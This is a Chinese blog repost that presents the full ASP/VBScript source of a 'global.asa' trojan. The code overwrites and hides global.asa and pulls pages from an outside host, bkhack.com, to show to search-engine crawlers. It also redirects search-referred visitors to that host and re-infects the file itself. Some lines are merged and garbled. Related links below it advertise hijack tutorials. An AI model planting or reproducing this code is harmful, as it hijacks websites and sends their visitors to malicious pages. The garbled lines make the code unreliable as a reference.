最近流行的global.asa木马代码实例

最新推荐文章于 2021-03-22 06:05:27 发布
最新推荐文章于 2021-03-22 06:05:27 发布
阅读量318 收藏
点赞数
原文链接:http://www.cnblogs.com/zftek/archive/2012/04/16/2451162.html
版权
  • 最近流行的global.asa木马代码实例:
  •  
  • 函数一:用来创建global.asa文件:

Public Function createasa(ByVal Content)

On Error Resume Next

Set fso = Server.CreateObject("scripting.filesystemobject")

set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))

f.Attributes=0

Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

Obj.Type = 2

Obj.open

Obj.Charset = "gb2312"

Obj.Position = Obj.Size

Obj.writetext = Content

Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2

Obj.Close

Set Obj = Nothing f.Attributes=1+2+4

set f=Nothing

Set fso = Nothing

End Function

 

函数二:读取木马种植者设定的网页源码.

Public Function GetHtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

End Function

 

函数三:判断访问网站的人的来源是否是各种搜索引擎.

Function check(user_agent)

allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")

check_agent=false

For agenti=lbound(allow_agent) to ubound(allow_agent)

If instr(user_agent,allow_agent(agenti))>0

then check_agent=true

exit for

end if

Next check=check_agent

End function

 

Function checkS(user_a)

check_a=false

If instr(user_a,"Baiduspider")>0

then check_a=true

end if

checkS=check_a

End function

 

 

Function CheckRefresh()

CheckRefresh = False

Dim Botlist,i,Repls Krobotlist = "baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask|gougou|114so"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0

Then CheckRefresh = True

Exit For

End If

Next

End Function

 

 

Sub sleep()

If response.IsClientConnected=true

then Response.Flushelse

response.end

end if

End Sub

 

Function rr()

Randomizerr=int(215920*rnd+239150)

End Function

 

cnnbd=lcase(request.servervariables("HTTP_HOST"))

If CheckRefresh=true

then

response.redirect("http://www.bkhack.com")

response.end

end If

user_agent=Request.ServerVariables("HTTP_USER_AGENT")

if check(user_agent)=true

then body=GetHtml("http://www.bkhack.com")

response.write

bodyresponse.endelseasa=GetHtml("http://www.bkhack.com")

if instr(asa,"by*aming")>0

then createasa(asa)

end if

if 0=1

then body=gethtml("http://www.bkhack.com")

response.write

bodyresponse.end

end if

Call sleep()

end if

转载于:https://www.cnblogs.com/zftek/archive/2012/04/16/2451162.html

abct123123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一种阻止global.asa挂马上传的方法
ilnature2008的博客
06-05 4017
Global.asa 文件是asp.net应用中一个可选的文件,它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。详细介绍: http://www.w3school.com.cn/asp/asp_globalasa.asp 该文件的作用就是让web网站所有asp文件先执行它,因此,只要把木马加到这个文件里,所有asp文件都会中这个病毒。 最近某客户网站的web根目
最新百度蜘蛛劫持代码
04-28
介绍什么的都在压缩包里面,完整的教程。一看就会用
GLOBAL.ASA (用于黑帽SEO,)
07-24
GLOBAL.ASA
网站global.asa木马
weixin_33851604的博客
01-25 153
最近在查看网站流量统计的时候发现流量有些异常,于是检查网站程序的时候发现程序多出了一个文件。文件名是Global.asa,上传时间为9月13日晚上,我的网站使用的是开源的企业建站系统,一开始没注意过这个问题,就在昨天我的网站流量一下子跌倒了低谷,当时我就怀疑是网站程序出现了问题,但是就是找不出毛病来。后来经常访问网站的客户打电话告诉我说:“从百度打开你的网站会自动跳转到某些色情网站上,并且会被36...
global.asa木马文件详解!
abct123123的博客
04-16 407
你的网站被挂马?被劫持了?可能对于一些有杀毒经验的站长来说是小问题,但对于普通人来说简直无法下手,或许说自己网站被挂马也发现不了。,最近有一种木马global.asa被黑客利用,从百度等搜索引擎访问网站的人都会被跳转到其他恶意网站上面.今天就给大家分析下怎么处置这种木马Global.asa 文件是一个可选的文件,它可包含可被ASP 应用程序中每个页面访问的对象、变量以及方法的...
java怎么编写木马,实现简单木马免杀(示例代码)
weixin_39755890的博客
03-22 1117
今天所学的知识一共有以下几点:ms08-067漏洞复现ms10-046漏洞复现木马免杀前面几个漏洞复现就不详细说了,跟着步骤操作基本可以成功,主要说一下今天做的简单木马免杀,下面进入正题。木马免杀Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,我是使用的shellter免杀,做的不是很好,跟大家分享一下我的实验结果。原理:生成木马文件,然后将生成的木马文件与*...
global.asa劫持教程
10-22
高性能劫持百度蜘蛛global.asa劫持教程
Global.asa文件技巧用法
10-23
本文介绍的是ASP的基础知识,Global.asa文件技巧用法,希望对大家有帮助,一起来看。
ASP的Global.asa文件技巧用法
10-23
主要介绍了ASP中Global.asa文件技巧用法,Global.asa文件可以管理在ASP应用中两个非常苛刻的对象:Application、Session,对这方面感兴趣的朋友可以参考一下
ASP的Global.asa使用说明
10-30
此外,Global.asa文件还可以用于实例化和配置第三方组件,这些组件可能在多个页面中使用。然而,它并不是一个用于存储通用函数和子程序的库,而应主要用于管理和响应特定的生命周期事件。 总之,ASP的Global.asa...
如何应对Global.asa木马
weixin_30764137的博客
12-11 266
Global.asa是针对百度的制作的一个非常邪恶的木马,沾染了它,就很难清理干净,网络上对这个木马的介绍很多,大多都是讲述怎么删除和防范,对于沾染这个木马清除之后的一些情况,却没有一篇文章能详细说明,之前我就自己处理这个木马的经验,写了一篇《详谈Global.asa清除及百度快照的更新》的文章,被各大网站转载了,但是这篇文章还有一些没谈到的,后来又做了修改,改为细谈,不管是详谈还是细谈,其实都...
搜索关键词劫持跳转
05-09
百度搜索关键词劫持跳转 if InStr(REFERER,keywords1) > 0 Or InStr(REFERER,keywords2)> 0 Or InStr(REFERER,keywords3> 0 Or InStr(REFERER,keywords4)> 0 Or InStr(REFERER,keywords5)> 0 Then
浏览器劫持源码
08-06
浏览器劫持源码 浏览器劫持.e
警惕ASP网站Global.asa导致网站被挂马或转向
weixin_30251587的博客
08-09 447
近几天帮朋友处理一个比较有难度的问题,网站输入域名访问正常打开,但从搜索引擎厚度或是Google之类的打开,就会跳转到某些色情网站上去.根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去,使用此种方法具有很强的隐匿性,因为站长们一般不会去搜索自己的网站,所以轻易不会发现自己站点遭到了挟持。因为网站是自...
网站被挂Global.asax木马的分析和解决办法
主宰
03-17 1274
近期接到几例用户反映网站被黑,这几个网站出现的情况都是网站根目录多出一个文件,名称是global.asa。用户使用各种办法都无法删除,下面我们就global.asa木马做一下专门分析: 网站被挂global.asa木马的危害 网站如果被挂global.asa木马,如果对于一个不懂网络营销,不懂网站优化的人来说,基本上没有任何影响,因为global.asa木马一般不会影响网站的正常运行,黑客...
global.d.ts vue3
最新发布
07-06
对于Vue框架来说,`global.d.ts`可能会包含对Vue组件、实例、以及一些核心API的类型定义。 当你在项目中引入了Vue并且使用了TypeScript,`global.d.ts`有助于提供类型安全,比如声明`import Vue from 'vue'`后Vue...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值